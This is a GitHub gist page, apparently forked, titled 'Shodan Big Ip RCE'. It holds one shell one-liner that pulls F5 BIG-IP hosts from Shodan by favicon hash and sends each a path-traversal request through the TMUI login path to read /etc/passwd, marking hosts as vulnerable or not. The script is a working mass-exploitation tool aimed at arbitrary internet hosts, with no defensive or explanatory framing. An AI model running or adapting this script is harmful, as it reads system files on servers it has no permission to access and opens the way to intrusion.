secfb/rce.sh

Forked from Mad-robot/rce.sh

Created July 5, 2020 17:01

Star 0 You must be signed in to star a gist
Fork 0 You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/secfb/640e2010722d39609be482f6f5644c95.js"></script>
Save secfb/640e2010722d39609be482f6f5644c95 to your computer and use it in GitHub Desktop.

Download ZIP

Shodan Big Ip RCE

Raw

rce.sh

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done

Author

secfb commented Jul 5, 2020

https://twitter.com/madrobot_/status/1279822259528458245?s=21

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment